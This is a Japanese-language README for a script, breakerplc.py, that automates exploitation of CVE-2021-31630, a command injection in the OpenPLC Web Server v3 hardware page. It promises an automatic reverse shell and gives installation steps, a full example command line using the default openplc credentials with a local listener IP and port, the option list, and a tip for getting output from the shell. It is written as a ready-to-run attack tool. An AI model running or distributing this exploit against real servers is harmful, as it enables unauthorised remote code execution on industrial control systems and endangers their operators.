
これはcve-2021-31630エクスプロイトの自動化です。
このスクリプトは、OpenPLC Web Server v3 の脆弱性を自動的に悪用します。
サーバーに対して手動テクニックを使わずに、自動でリバースシェルを作成できます。
CVE-2021-31630 の詳細 Open PLC Webserver v3 のコマンドインジェクションにより、リモートの攻撃者がアプリケーションの「/hardware」ページにある「Hardware Layer Code Box」コンポーネントを介して任意のコードを実行できます。
このスクリプトは、OpenPLC へのスクリプト登録が完了した後、同じターミナルでマシンのシェルを生成するようにカスタマイズされています。
以下のコマンドを使用してください(依存関係をインストールするには Python 仮想環境を作成することをお勧めします)# ただし、breakerplc.py スクリプトは仮想環境の外で実行する必要があります。
sudo apt update
pip3 install requests
使用方法は?以下のコマンドラインを使用できます(下記)。
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

重要
接続後、コードの行を区切ってシェルを返すために、"whoami" または "ls" と入力する必要があります。
